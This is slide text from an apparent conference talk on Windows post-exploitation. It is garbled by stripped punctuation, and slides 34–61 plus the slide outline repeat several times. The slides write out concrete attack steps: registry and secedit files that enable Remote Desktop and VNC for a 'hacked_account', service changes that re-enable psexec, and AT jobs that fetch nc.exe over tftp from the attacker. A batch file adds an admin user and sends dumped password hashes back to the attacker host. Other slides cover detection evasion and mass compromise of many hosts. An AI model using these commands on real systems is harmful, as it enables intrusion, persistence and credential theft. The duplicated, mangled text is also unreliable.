bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
